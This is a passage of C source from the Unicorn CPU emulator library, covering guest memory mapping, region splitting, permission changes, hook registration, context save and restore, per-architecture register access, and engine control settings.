false; // end address overlaps this region? if (end >= uc->mapped_blocks[i]->addr) return true; // not found return false; } // common setup/error checking shared between uc_mem_map and uc_mem_map_ptr static uc_err mem_map(uc_engine *uc, MemoryRegion *block) { MemoryRegion **regions; int pos; if (block == NULL) { return UC_ERR_NOMEM; } if ((uc->mapped_block_count & (MEM_BLOCK_INCR - 1)) == 0) { // time to grow regions = (MemoryRegion **)g_realloc( uc->mapped_blocks, sizeof(MemoryRegion *) * (uc->mapped_block_count + MEM_BLOCK_INCR)); if (regions == NULL) { return UC_ERR_NOMEM; } uc->mapped_blocks = regions; } pos = bsearch_mapped_blocks(uc, block->addr); // shift the array right to give space for the new pointer memmove(&uc->mapped_blocks[pos + 1], &uc->mapped_blocks[pos], sizeof(MemoryRegion *) * (uc->mapped_block_count - pos)); uc->mapped_blocks[pos] = block; uc->mapped_block_count++; return UC_ERR_OK; } static uc_err mem_map_check(uc_engine *uc, uint64_t address, size_t size, uint32_t perms) { if (size == 0) { // invalid memory mapping return UC_ERR_ARG; } // address cannot wrapp around if (address + size - 1 < address) { return UC_ERR_ARG; } // address must be aligned to uc->target_page_size if ((address & uc->target_page_align) != 0) { return UC_ERR_ARG; } // size must be multiple of uc->target_page_size if ((size & uc->target_page_align) != 0) { return UC_ERR_ARG; } // check for only valid permissions if ((perms & ~UC_PROT_ALL) != 0) { return UC_ERR_ARG; } // this area overlaps existing mapped regions? if (memory_overlap(uc, address, size)) { return UC_ERR_MAP; } return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms) { uc_err res; UC_INIT(uc); res = mem_map_check(uc, address, size, perms); if (res) { restore_jit_state(uc); return res; } res = mem_map(uc, uc->memory_map(uc, address, size, perms)); restore_jit_state(uc); return res; } UNICORN_EXPORT uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr) { uc_err res; UC_INIT(uc); if (ptr == NULL) { restore_jit_state(uc); return UC_ERR_ARG; } res = mem_map_check(uc, address, size, perms); if (res) { restore_jit_state(uc); return res; } res = mem_map(uc, uc->memory_map_ptr(uc, address, size, perms, ptr)); restore_jit_state(uc); return res; } UNICORN_EXPORT uc_err uc_mmio_map(uc_engine *uc, uint64_t address, size_t size, uc_cb_mmio_read_t read_cb, void *user_data_read, uc_cb_mmio_write_t write_cb, void *user_data_write) { uc_err res; UC_INIT(uc); res = mem_map_check(uc, address, size, UC_PROT_ALL); if (res) { restore_jit_state(uc); return res; } // The callbacks do not need to be checked for NULL here, as their presence // (or lack thereof) will determine the permissions used. res = mem_map(uc, uc->memory_map_io(uc, address, size, read_cb, write_cb, user_data_read, user_data_write)); restore_jit_state(uc); return res; } // Create a backup copy of the indicated MemoryRegion. // Generally used in prepartion for splitting a MemoryRegion. static uint8_t *copy_region(struct uc_struct *uc, MemoryRegion *mr) { uint8_t *block = (uint8_t *)g_malloc0((size_t)int128_get64(mr->size)); if (block != NULL) { uc_err err = uc_mem_read(uc, mr->addr, block, (size_t)int128_get64(mr->size)); if (err != UC_ERR_OK) { free(block); block = NULL; } } return block; } /* This function is similar to split_region, but for MMIO memory. Note this function may be called recursively. */ static bool split_mmio_region(struct uc_struct *uc, MemoryRegion *mr, uint64_t address, size_t size, bool do_delete) { uint64_t begin, end, chunk_end; size_t l_size, r_size, m_size; mmio_cbs backup; chunk_end = address + size; // This branch also break recursion. if (address <= mr->addr && chunk_end >= mr->end) { return true; } if (size == 0) { return false; } begin = mr->addr; end = mr->end; memcpy(&backup, mr->opaque, sizeof(mmio_cbs)); /* overlapping cases * |------mr------| * case 1 |---size--| // Is it possible??? * case 2 |--size--| * case 3 |---size--| */ // unmap this region first, then do split it later if (uc_mem_unmap(uc, mr->addr, (size_t)int128_get64(mr->size)) != UC_ERR_OK) { return false; } // adjust some things if (address < begin) { address = begin; } if (chunk_end > end) { chunk_end = end; } // compute sub region sizes l_size = (size_t)(address - begin); r_size = (size_t)(end - chunk_end); m_size = (size_t)(chunk_end - address); if (l_size > 0) { if (uc_mmio_map(uc, begin, l_size, backup.read, backup.user_data_read, backup.write, backup.user_data_write) != UC_ERR_OK) { return false; } } if (m_size > 0 && !do_delete) { if (uc_mmio_map(uc, address, m_size, backup.read, backup.user_data_read, backup.write, backup.user_data_write) != UC_ERR_OK) { return false; } } if (r_size > 0) { if (uc_mmio_map(uc, chunk_end, r_size, backup.read, backup.user_data_read, backup.write, backup.user_data_write) != UC_ERR_OK) { return false; } } return true; } /* Split the given MemoryRegion at the indicated address for the indicated size this may result in the create of up to 3 spanning sections. If the delete parameter is true, the no new section will be created to replace the indicate range. This functions exists to support uc_mem_protect and uc_mem_unmap. This is a static function and callers have already done some preliminary parameter validation. The do_delete argument indicates that we are being called to support uc_mem_unmap. In this case we save some time by choosing NOT to remap the areas that are intended to get unmapped */ // TODO: investigate whether qemu region manipulation functions already offered // this capability static bool split_region(struct uc_struct *uc, MemoryRegion *mr, uint64_t address, size_t size, bool do_delete) { uint8_t *backup; uint32_t perms; uint64_t begin, end, chunk_end; size_t l_size, m_size, r_size; RAMBlock *block = NULL; bool prealloc = false; chunk_end = address + size; // if this region belongs to area [address, address+size], // then there is no work to do. if (address <= mr->addr && chunk_end >= mr->end) { return true; } if (size == 0) { // trivial case return true; } if (address >= mr->end || chunk_end <= mr->addr) { // impossible case return false; } // Find the correct and large enough (which contains our target mr) // to create the content backup. block = mr->ram_block; if (block == NULL) { return false; } // RAM_PREALLOC is not defined outside exec.c and I didn't feel like // moving it prealloc = !!(block->flags & 1); if (block->flags & 1) { backup = block->host; } else { backup = copy_region(uc, mr); if (backup == NULL) { return false; } } // save the essential information required for the split before mr gets // deleted perms = mr->perms; begin = mr->addr; end = mr->end; // unmap this region first, then do split it later if (uc_mem_unmap(uc, mr->addr, (size_t)int128_get64(mr->size)) != UC_ERR_OK) { goto error; } /* overlapping cases * |------mr------| * case 1 |---size--| * case 2 |--size--| * case 3 |---size--| */ // adjust some things if (address < begin) { address = begin; } if (chunk_end > end) { chunk_end = end; } // compute sub region sizes l_size = (size_t)(address - begin); r_size = (size_t)(end - chunk_end); m_size = (size_t)(chunk_end - address); // If there are error in any of the below operations, things are too far // gone at that point to recover. Could try to remap orignal region, but // these smaller allocation just failed so no guarantee that we can recover // the original allocation at this point if (l_size > 0) { if (!prealloc) { if (uc_mem_map(uc, begin, l_size, perms) != UC_ERR_OK) { goto error; } if (uc_mem_write(uc, begin, backup, l_size) != UC_ERR_OK) { goto error; } } else { if (uc_mem_map_ptr(uc, begin, l_size, perms, backup) != UC_ERR_OK) { goto error; } } } if (m_size > 0 && !do_delete) { if (!prealloc) { if (uc_mem_map(uc, address, m_size, perms) != UC_ERR_OK) { goto error; } if (uc_mem_write(uc, address, backup + l_size, m_size) != UC_ERR_OK) { goto error; } } else { if (uc_mem_map_ptr(uc, address, m_size, perms, backup + l_size) != UC_ERR_OK) { goto error; } } } if (r_size > 0) { if (!prealloc) { if (uc_mem_map(uc, chunk_end, r_size, perms) != UC_ERR_OK) { goto error; } if (uc_mem_write(uc, chunk_end, backup + l_size + m_size, r_size) != UC_ERR_OK) { goto error; } } else { if (uc_mem_map_ptr(uc, chunk_end, r_size, perms, backup + l_size + m_size) != UC_ERR_OK) { goto error; } } } if (!prealloc) { free(backup); } return true; error: if (!prealloc) { free(backup); } return false; } UNICORN_EXPORT uc_err uc_mem_protect(struct uc_struct *uc, uint64_t address, size_t size, uint32_t perms) { MemoryRegion *mr; uint64_t addr = address; uint64_t pc; size_t count, len; bool remove_exec = false; UC_INIT(uc); // snapshot and protection can't be mixed if (uc->snapshot_level > 0) { restore_jit_state(uc); return UC_ERR_ARG; } if (size == 0) { // trivial case, no change restore_jit_state(uc); return UC_ERR_OK; } // address must be aligned to uc->target_page_size if ((address & uc->target_page_align) != 0) { restore_jit_state(uc); return UC_ERR_ARG; } // size must be multiple of uc->target_page_size if ((size & uc->target_page_align) != 0) { restore_jit_state(uc); return UC_ERR_ARG; } // check for only valid permissions if ((perms & ~UC_PROT_ALL) != 0) { restore_jit_state(uc); return UC_ERR_ARG; } // check that user's entire requested block is mapped // TODO check if protected is possible // deny after cow if (!check_mem_area(uc, address, size)) { restore_jit_state(uc); return UC_ERR_NOMEM; } // Now we know entire region is mapped, so change permissions // We may need to split regions if this area spans adjacent regions addr = address; count = 0; while (count < size) { mr = uc->memory_mapping(uc, addr); len = memory_region_len(uc, mr, addr, size - count); if (mr->ram) { if (!split_region(uc, mr, addr, len, false)) { restore_jit_state(uc); return UC_ERR_NOMEM; } mr = uc->memory_mapping(uc, addr); // will this remove EXEC permission? if (((mr->perms & UC_PROT_EXEC) != 0) && ((perms & UC_PROT_EXEC) == 0)) { remove_exec = true; } mr->perms = perms; uc->readonly_mem(mr, (perms & UC_PROT_WRITE) == 0); } else { if (!split_mmio_region(uc, mr, addr, len, false)) { restore_jit_state(uc); return UC_ERR_NOMEM; } mr = uc->memory_mapping(uc, addr); mr->perms = perms; } count += len; addr += len; } // if EXEC permission is removed, then quit TB and continue at the same // place if (remove_exec) { pc = uc->get_pc(uc); if (pc < address + size && pc >= address) { uc->quit_request = true; uc_emu_stop(uc); } } restore_jit_state(uc); return UC_ERR_OK; } static uc_err uc_mem_unmap_snapshot(struct uc_struct *uc, uint64_t address, size_t size, MemoryRegion **ret) { MemoryRegion *mr; mr = uc->memory_mapping(uc, address); while (mr->container != uc->system_memory) { mr = mr->container; } if (mr->addr != address || int128_get64(mr->size) != size) { return UC_ERR_ARG; } if (ret) { *ret = mr; } uc->memory_moveout(uc, mr); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_mem_unmap(struct uc_struct *uc, uint64_t address, size_t size) { MemoryRegion *mr; uint64_t addr; size_t count, len; UC_INIT(uc); if (size == 0) { // nothing to unmap restore_jit_state(uc); return UC_ERR_OK; } // address must be aligned to uc->target_page_size if ((address & uc->target_page_align) != 0) { restore_jit_state(uc); return UC_ERR_ARG; } // size must be multiple of uc->target_page_size if ((size & uc->target_page_align) != 0) { restore_jit_state(uc); return UC_ERR_ARG; } // check that user's entire requested block is mapped if (!check_mem_area(uc, address, size)) { restore_jit_state(uc); return UC_ERR_NOMEM; } if (uc->snapshot_level > 0) { uc_err res = uc_mem_unmap_snapshot(uc, address, size, NULL); restore_jit_state(uc); return res; } // Now we know entire region is mapped, so do the unmap // We may need to split regions if this area spans adjacent regions addr = address; count = 0; while (count < size) { mr = uc->memory_mapping(uc, addr); len = memory_region_len(uc, mr, addr, size - count); if (!mr->ram) { if (!split_mmio_region(uc, mr, addr, len, true)) { restore_jit_state(uc); return UC_ERR_NOMEM; } } else { if (!split_region(uc, mr, addr, len, true)) { restore_jit_state(uc); return UC_ERR_NOMEM; } } // if we can retrieve the mapping, then no splitting took place // so unmap here mr = uc->memory_mapping(uc, addr); if (mr != NULL) { uc->memory_unmap(uc, mr); } count += len; addr += len; } restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, ...) { int ret = UC_ERR_OK; int i = 0; UC_INIT(uc); struct hook *hook = calloc(1, sizeof(struct hook)); if (hook == NULL) { restore_jit_state(uc); return UC_ERR_NOMEM; } hook->begin = begin; hook->end = end; hook->type = type; hook->callback = callback; hook->user_data = user_data; hook->refs = 0; hook->to_delete = false; hook->hooked_regions = g_hash_table_new_full( hooked_regions_hash, hooked_regions_equal, g_free, NULL); *hh = (uc_hook)hook; // UC_HOOK_INSN has an extra argument for instruction ID if (type & UC_HOOK_INSN) { va_list valist; va_start(valist, end); hook->insn = va_arg(valist, int); va_end(valist); if (uc->insn_hook_validate) { if (!uc->insn_hook_validate(hook->insn)) { free(hook); restore_jit_state(uc); return UC_ERR_HOOK; } } if (uc->hook_insert) { if (hook_insert(&uc->hook[UC_HOOK_INSN_IDX], hook) == NULL) { free(hook); restore_jit_state(uc); return UC_ERR_NOMEM; } } else { if (hook_append(&uc->hook[UC_HOOK_INSN_IDX], hook) == NULL) { free(hook); restore_jit_state(uc); return UC_ERR_NOMEM; } } uc->hooks_count[UC_HOOK_INSN_IDX]++; restore_jit_state(uc); return UC_ERR_OK; } if (type & UC_HOOK_TCG_OPCODE) { va_list valist; va_start(valist, end); hook->op = va_arg(valist, int); hook->op_flags = va_arg(valist, int); va_end(valist); if (uc->opcode_hook_invalidate) { if (!uc->opcode_hook_invalidate(hook->op, hook->op_flags)) { free(hook); restore_jit_state(uc); return UC_ERR_HOOK; } } if (uc->hook_insert) { if (hook_insert(&uc->hook[UC_HOOK_TCG_OPCODE_IDX], hook) == NULL) { free(hook); restore_jit_state(uc); return UC_ERR_NOMEM; } } else { if (hook_append(&uc->hook[UC_HOOK_TCG_OPCODE_IDX], hook) == NULL) { free(hook); restore_jit_state(uc); return UC_ERR_NOMEM; } } uc->hooks_count[UC_HOOK_TCG_OPCODE_IDX]++; return UC_ERR_OK; } while ((type >> i) > 0) { if ((type >> i) & 1) { // TODO: invalid hook error? if (i < UC_HOOK_MAX) { if (uc->hook_insert) { if (hook_insert(&uc->hook[i], hook) == NULL) { free(hook); restore_jit_state(uc); return UC_ERR_NOMEM; } } else { if (hook_append(&uc->hook[i], hook) == NULL) { free(hook); restore_jit_state(uc); return UC_ERR_NOMEM; } } uc->hooks_count[i]++; } } i++; } // we didn't use the hook // TODO: return an error? if (hook->refs == 0) { free(hook); } restore_jit_state(uc); return ret; } UNICORN_EXPORT uc_err uc_hook_del(uc_engine *uc, uc_hook hh) { int i; struct hook *hook = (struct hook *)hh; UC_INIT(uc); // we can't dereference hook->type if hook is invalid // so for now we need to iterate over all possible types to remove the hook // which is less efficient // an optimization would be to align the hook pointer // and store the type mask in the hook pointer. for (i = 0; i < UC_HOOK_MAX; i++) { if (list_exists(&uc->hook[i], (void *)hook)) { g_hash_table_foreach(hook->hooked_regions, hook_invalidate_region, uc); g_hash_table_remove_all(hook->hooked_regions); hook->to_delete = true; uc->hooks_count[i]--; hook_append(&uc->hooks_to_del, hook); } } restore_jit_state(uc); return UC_ERR_OK; } // TCG helper // 2 arguments are enough for most opcodes. Load/Store needs 3 arguments but we // have memory hooks already. We may exceed the maximum arguments of a tcg // helper but that's easy to extend. void helper_uc_traceopcode(struct hook *hook, uint64_t arg1, uint64_t arg2, uint32_t size, void *handle, uint64_t address); void helper_uc_traceopcode(struct hook *hook, uint64_t arg1, uint64_t arg2, uint32_t size, void *handle, uint64_t address) { struct uc_struct *uc = handle; if (unlikely(uc->stop_request)) { return; } if (unlikely(hook->to_delete)) { return; } // We did all checks in translation time. // // This could optimize the case that we have multiple hooks with different // opcodes and have one callback per opcode. Note that the assumption don't // hold in most cases for uc_tracecode. // // TODO: Shall we have a flag to allow users to control whether updating PC? JIT_CALLBACK_GUARD(((uc_hook_tcg_op_2)hook->callback)( uc, address, arg1, arg2, size, hook->user_data)); if (unlikely(uc->stop_request)) { return; } } void helper_uc_tracecode(int32_t size, uc_hook_idx index, void *handle, int64_t address); void helper_uc_tracecode(int32_t size, uc_hook_idx index, void *handle, int64_t address) { struct uc_struct *uc = handle; struct list_item *cur; struct hook *hook; int hook_flags = index & UC_HOOK_FLAG_MASK; // The index here may contain additional flags. See // the comments of uc_hook_idx for details. index = index & UC_HOOK_IDX_MASK; // This has been done in tcg code. // sync PC in CPUArchState with address // if (uc->set_pc) { // uc->set_pc(uc, address); // } // the last callback may already asked to stop emulation if (uc->stop_request && !(hook_flags & UC_HOOK_FLAG_NO_STOP)) { return; } for (cur = uc->hook[index].head; cur != NULL && (hook = (struct hook *)cur->data); cur = cur->next) { if (hook->to_delete) { continue; } // on invalid block/instruction, call instruction counter (if enable), // then quit if (size == 0) { if (index == UC_HOOK_CODE_IDX && uc->count_hook) { // this is the instruction counter (first hook in the list) JIT_CALLBACK_GUARD(((uc_cb_hookcode_t)hook->callback)( uc, address, size, hook->user_data)); } return; } if (HOOK_BOUND_CHECK(hook, (uint64_t)address)) { JIT_CALLBACK_GUARD(((uc_cb_hookcode_t)hook->callback)( uc, address, size, hook->user_data)); } // the last callback may already asked to stop emulation // Unicorn: // In an ARM IT block, we behave like the emulation continues // normally. No check_exit_request is generated and the hooks are // triggered normally. In other words, the whole IT block is treated // as a single instruction. if (uc->stop_request && !(hook_flags & UC_HOOK_FLAG_NO_STOP)) { break; } } } UNICORN_EXPORT uc_err uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count) { uint32_t i; uc_mem_region *r = NULL; UC_INIT(uc); *count = uc->mapped_block_count; if (*count) { r = g_malloc0(*count * sizeof(uc_mem_region)); if (r == NULL) { // out of memory restore_jit_state(uc); return UC_ERR_NOMEM; } } for (i = 0; i < *count; i++) { r[i].begin = uc->mapped_blocks[i]->addr; r[i].end = uc->mapped_blocks[i]->end - 1; r[i].perms = uc->mapped_blocks[i]->perms; } *regions = r; restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result) { UC_INIT(uc); switch (type) { default: return UC_ERR_ARG; case UC_QUERY_PAGE_SIZE: *result = uc->target_page_size; break; case UC_QUERY_ARCH: *result = uc->arch; break; case UC_QUERY_MODE: #ifdef UNICORN_HAS_ARM if (uc->arch == UC_ARCH_ARM) { return uc->query(uc, type, result); } #endif *result = uc->mode; break; case UC_QUERY_TIMEOUT: *result = uc->timed_out; break; } restore_jit_state(uc); return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_context_alloc(uc_engine *uc, uc_context **context) { struct uc_context **_context = context; size_t size = uc_context_size(uc); UC_INIT(uc); *_context = g_malloc(size); if (*_context) { (*_context)->context_size = size - sizeof(uc_context); (*_context)->arch = uc->arch; (*_context)->mode = uc->mode; restore_jit_state(uc); return UC_ERR_OK; } else { restore_jit_state(uc); return UC_ERR_NOMEM; } } UNICORN_EXPORT uc_err uc_free(void *mem) { g_free(mem); return UC_ERR_OK; } UNICORN_EXPORT size_t uc_context_size(uc_engine *uc) { UC_INIT(uc); restore_jit_state(uc); if (!uc->context_size) { // return the total size of struct uc_context return sizeof(uc_context) + uc->cpu_context_size; } else { return sizeof(uc_context) + uc->context_size(uc); } } UNICORN_EXPORT uc_err uc_context_save(uc_engine *uc, uc_context *context) { UC_INIT(uc); uc_err ret = UC_ERR_OK; if (uc->context_content & UC_CTL_CONTEXT_MEMORY) { ret = uc_snapshot(uc); if (ret != UC_ERR_OK) { restore_jit_state(uc); return ret; } } context->snapshot_level = uc->snapshot_level; if (uc->context_content & UC_CTL_CONTEXT_CPU) { if (!uc->context_save) { memcpy(context->data, uc->cpu->env_ptr, context->context_size); restore_jit_state(uc); return UC_ERR_OK; } else { ret = uc->context_save(uc, context); restore_jit_state(uc); return ret; } } restore_jit_state(uc); return ret; } // Keep in mind that we don't a uc_engine when r/w the registers of a context. static context_reg_rw_t find_context_reg_rw(uc_arch arch, uc_mode mode) { // We believe that the arch/mode pair is correct. context_reg_rw_t rw = {default_reg_read, default_reg_write}; switch (arch) { default: break; #ifdef UNICORN_HAS_M68K case UC_ARCH_M68K: rw.read = reg_read_m68k; rw.write = reg_write_m68k; break; #endif #ifdef UNICORN_HAS_X86 case UC_ARCH_X86: rw.read = reg_read_x86_64; rw.write = reg_write_x86_64; break; #endif #ifdef UNICORN_HAS_ARM case UC_ARCH_ARM: rw.read = reg_read_arm; rw.write = reg_write_arm; break; #endif #ifdef UNICORN_HAS_ARM64 case UC_ARCH_ARM64: rw.read = reg_read_aarch64; rw.write = reg_write_aarch64; break; #endif #if defined(UNICORN_HAS_MIPS) || defined(UNICORN_HAS_MIPSEL) || \ defined(UNICORN_HAS_MIPS64) || defined(UNICORN_HAS_MIPS64EL) case UC_ARCH_MIPS: if (mode & UC_MODE_BIG_ENDIAN) { #ifdef UNICORN_HAS_MIPS if (mode & UC_MODE_MIPS32) { rw.read = reg_read_mips; rw.write = reg_write_mips; } #endif #ifdef UNICORN_HAS_MIPS64 if (mode & UC_MODE_MIPS64) { rw.read = reg_read_mips64; rw.write = reg_write_mips64; } #endif } else { // little endian #ifdef UNICORN_HAS_MIPSEL if (mode & UC_MODE_MIPS32) { rw.read = reg_read_mipsel; rw.write = reg_write_mipsel; } #endif #ifdef UNICORN_HAS_MIPS64EL if (mode & UC_MODE_MIPS64) { rw.read = reg_read_mips64el; rw.write = reg_write_mips64el; } #endif } break; #endif #ifdef UNICORN_HAS_SPARC case UC_ARCH_SPARC: if (mode & UC_MODE_SPARC64) { rw.read = reg_read_sparc64; rw.write = reg_write_sparc64; } else { rw.read = reg_read_sparc; rw.write = reg_write_sparc; } break; #endif #ifdef UNICORN_HAS_PPC case UC_ARCH_PPC: if (mode & UC_MODE_PPC64) { rw.read = reg_read_ppc64; rw.write = reg_write_ppc64; } else { rw.read = reg_read_ppc; rw.write = reg_write_ppc; } break; #endif #ifdef UNICORN_HAS_RISCV case UC_ARCH_RISCV: if (mode & UC_MODE_RISCV32) { rw.read = reg_read_riscv32; rw.write = reg_write_riscv32; } else if (mode & UC_MODE_RISCV64) { rw.read = reg_read_riscv64; rw.write = reg_write_riscv64; } break; #endif #ifdef UNICORN_HAS_S390X case UC_ARCH_S390X: rw.read = reg_read_s390x; rw.write = reg_write_s390x; break; #endif #ifdef UNICORN_HAS_TRICORE case UC_ARCH_TRICORE: rw.read = reg_read_tricore; rw.write = reg_write_tricore; break; #endif } return rw; } UNICORN_EXPORT uc_err uc_context_reg_write(uc_context *ctx, int regid, const void *value) { int setpc = 0; size_t size = (size_t)-1; return find_context_reg_rw(ctx->arch, ctx->mode) .write(ctx->data, ctx->mode, regid, value, &size, &setpc); } UNICORN_EXPORT uc_err uc_context_reg_read(uc_context *ctx, int regid, void *value) { size_t size = (size_t)-1; return find_context_reg_rw(ctx->arch, ctx->mode) .read(ctx->data, ctx->mode, regid, value, &size); } UNICORN_EXPORT uc_err uc_context_reg_write2(uc_context *ctx, int regid, const void *value, size_t *size) { int setpc = 0; return find_context_reg_rw(ctx->arch, ctx->mode) .write(ctx->data, ctx->mode, regid, value, size, &setpc); } UNICORN_EXPORT uc_err uc_context_reg_read2(uc_context *ctx, int regid, void *value, size_t *size) { return find_context_reg_rw(ctx->arch, ctx->mode) .read(ctx->data, ctx->mode, regid, value, size); } UNICORN_EXPORT uc_err uc_context_reg_write_batch(uc_context *ctx, int *regs, void *const *vals, int count) { reg_write_t reg_write = find_context_reg_rw(ctx->arch, ctx->mode).write; void *env = ctx->data; int mode = ctx->mode; int setpc = 0; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; const void *value = vals[i]; size_t size = (size_t)-1; uc_err err = reg_write(env, mode, regid, value, &size, &setpc); if (err) { return err; } } return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_context_reg_read_batch(uc_context *ctx, int *regs, void **vals, int count) { reg_read_t reg_read = find_context_reg_rw(ctx->arch, ctx->mode).read; void *env = ctx->data; int mode = ctx->mode; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; void *value = vals[i]; size_t size = (size_t)-1; uc_err err = reg_read(env, mode, regid, value, &size); if (err) { return err; } } return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_context_reg_write_batch2(uc_context *ctx, int *regs, const void *const *vals, size_t *sizes, int count) { reg_write_t reg_write = find_context_reg_rw(ctx->arch, ctx->mode).write; void *env = ctx->data; int mode = ctx->mode; int setpc = 0; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; const void *value = vals[i]; uc_err err = reg_write(env, mode, regid, value, sizes + i, &setpc); if (err) { return err; } } return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_context_reg_read_batch2(uc_context *ctx, int *regs, void *const *vals, size_t *sizes, int count) { reg_read_t reg_read = find_context_reg_rw(ctx->arch, ctx->mode).read; void *env = ctx->data; int mode = ctx->mode; int i; for (i = 0; i < count; i++) { unsigned int regid = regs[i]; void *value = vals[i]; uc_err err = reg_read(env, mode, regid, value, sizes + i); if (err) { return err; } } return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_context_restore(uc_engine *uc, uc_context *context) { UC_INIT(uc); uc_err ret; if (uc->context_content & UC_CTL_CONTEXT_MEMORY) { uc->snapshot_level = context->snapshot_level; ret = uc_restore_latest_snapshot(uc); if (ret != UC_ERR_OK) { return ret; } uc_snapshot(uc); } if (uc->context_content & UC_CTL_CONTEXT_CPU) { if (!uc->context_restore) { memcpy(uc->cpu->env_ptr, context->data, context->context_size); return UC_ERR_OK; } else { return uc->context_restore(uc, context); } } return UC_ERR_OK; } UNICORN_EXPORT uc_err uc_context_free(uc_context *context) { return uc_free(context); } typedef struct _uc_ctl_exit_request { uint64_t *array; size_t len; } uc_ctl_exit_request; static inline gboolean uc_read_exit_iter(gpointer key, gpointer val, gpointer data) { uc_ctl_exit_request *req = (uc_ctl_exit_request *)data; req->array[req->len++] = *(uint64_t *)key; return false; } UNICORN_EXPORT uc_err uc_ctl(uc_engine *uc, uc_control_type control, ...) { int rw, type; uc_err err = UC_ERR_OK; va_list args; // MSVC Would do signed shift on signed integers. rw = (uint32_t)control >> 30; type = (control & ((1 << 16) - 1)); va_start(args, control); switch (type) { case UC_CTL_UC_MODE: { if (rw == UC_CTL_IO_READ) { int *pmode = va_arg(args, int *); *pmode = uc->mode; } else { err = UC_ERR_ARG; } break; } case UC_CTL_UC_ARCH: { if (rw == UC_CTL_IO_READ) { int *arch = va_arg(args, int *); *arch = uc->arch; } else { err = UC_ERR_ARG; } break; } case UC_CTL_UC_TIMEOUT: { if (rw == UC_CTL_IO_READ) { uint64_t *arch = va_arg(args, uint64_t *); *arch = uc->timeout; } else { err = UC_ERR_ARG; } break; } case UC_CTL_UC_PAGE_SIZE: { if (rw == UC_CTL_IO_READ) { UC_INIT(uc); uint32_t *page_size = va_arg(args, uint32_t *); *page_size = uc->target_page_size; restore_jit_state(uc); } else { uint32_t page_size = va_arg(args, uint32_t); int bits = 0; if (uc->init_done) { err = UC_ERR_ARG; break; } if (uc->arch != UC_ARCH_ARM) { err = UC_ERR_ARG; break; } if ((page_size & (page_size - 1))) { err = UC_ERR_ARG; break; } while (page_size) { bits++; page_size >>= 1; } uc->target_bits = bits; err = UC_ERR_OK; } break; } case UC_CTL_UC_USE_EXITS: { if (rw == UC_CTL_IO_WRITE) { int use_exits = va_arg(args, int); uc->use_exits = use_exits; } else { err = UC_ERR_ARG; } break; } case UC_CTL_UC_EXITS_CNT: { UC_INIT(uc); if (!uc->use_exits) { err = UC_ERR_ARG; } else if (rw == UC_CTL_IO_READ) { size_t *exits_cnt = va_arg(args, size_t *); *exits_cnt = g_tree_nnodes(uc->ctl_exits); } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; } case UC_CTL_UC_EXITS: { UC_INIT(uc); if (!uc->use_exits) { err = UC_ERR_ARG; } else if (rw == UC_CTL_IO_READ) { uint64_t *exits = va_arg(args, uint64_t *); size_t cnt = va_arg(args, size_t); if (cnt < g_tree_nnodes(uc->ctl_exits)) { err = UC_ERR_ARG; } else { uc_ctl_exit_request req; req.array = exits; req.len = 0; g_tree_foreach(uc->ctl_exits, uc_read_exit_iter, (void *)&req); } } else if (rw == UC_CTL_IO_WRITE) { uint64_t *exits = va_arg(args, uint64_t *); size_t cnt = va_arg(args, size_t); g_tree_remove_all(uc->ctl_exits); for (size_t i = 0; i < cnt; i++) { uc_add_exit(uc, exits[i]); } } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; } case UC_CTL_CPU_MODEL: { if (rw == UC_CTL_IO_READ) { UC_INIT(uc); int *model = va_arg(args, int *); *model = uc->cpu_model; save_jit_state(uc); } else { int model = va_arg(args, int); if (model < 0 || uc->init_done) { err = UC_ERR_ARG; break; } if (uc->arch == UC_ARCH_X86) { if (model >= UC_CPU_X86_ENDING) { err = UC_ERR_ARG; break; } } else if (uc->arch == UC_ARCH_ARM) { if (model >= UC_CPU_ARM_ENDING) { err = UC_ERR_ARG; break; } if (uc->mode & UC_MODE_BIG_ENDIAN) { // These cpu models don't support big endian code access. if (model <= UC_CPU_ARM_CORTEX_A15 && model >= UC_CPU_ARM_CORTEX_A7) { err = UC_ERR_ARG; break; } } } else if (uc->arch == UC_ARCH_ARM64) { if (model >= UC_CPU_ARM64_ENDING) { err = UC_ERR_ARG; break; } } else if (uc->arch == UC_ARCH_MIPS) { if (uc->mode & UC_MODE_32 && model >= UC_CPU_MIPS32_ENDING) { err = UC_ERR_ARG; break; } if (uc->mode & UC_MODE_64 && model >= UC_CPU_MIPS64_ENDING) { err = UC_ERR_ARG; break; } } else if (uc->arch == UC_ARCH_PPC) { // UC_MODE_PPC32 == UC_MODE_32 if (uc->mode & UC_MODE_32 && model >= UC_CPU_PPC32_ENDING) { err = UC_ERR_ARG; break; } if (uc->mode & UC_MODE_64 && model >= UC_CPU_PPC64_ENDING) { err = UC_ERR_ARG; break; } } else if (uc->arch == UC_ARCH_RISCV) { if (uc->mode & UC_MODE_32 && model >= UC_CPU_RISCV32_ENDING) { err = UC_ERR_ARG; break; } if (uc->mode & UC_MODE_64 && model >= UC_CPU_RISCV64_ENDING) { err = UC_ERR_ARG; break; } } else if (uc->arch == UC_ARCH_S390X) { if (model >= UC_CPU_S390X_ENDING) { err = UC_ERR_ARG; break; } } else if (uc->arch == UC_ARCH_SPARC) { if (uc->mode & UC_MODE_32 && model >= UC_CPU_SPARC32_ENDING) { err = UC_ERR_ARG; break; } if (uc->mode & UC_MODE_64 && model >= UC_CPU_SPARC64_ENDING) { err = UC_ERR_ARG; break; } } else if (uc->arch == UC_ARCH_M68K) { if (model >= UC_CPU_M68K_ENDING) { err = UC_ERR_ARG; break; } } else { err = UC_ERR_ARG; break; } uc->cpu_model = model; err = 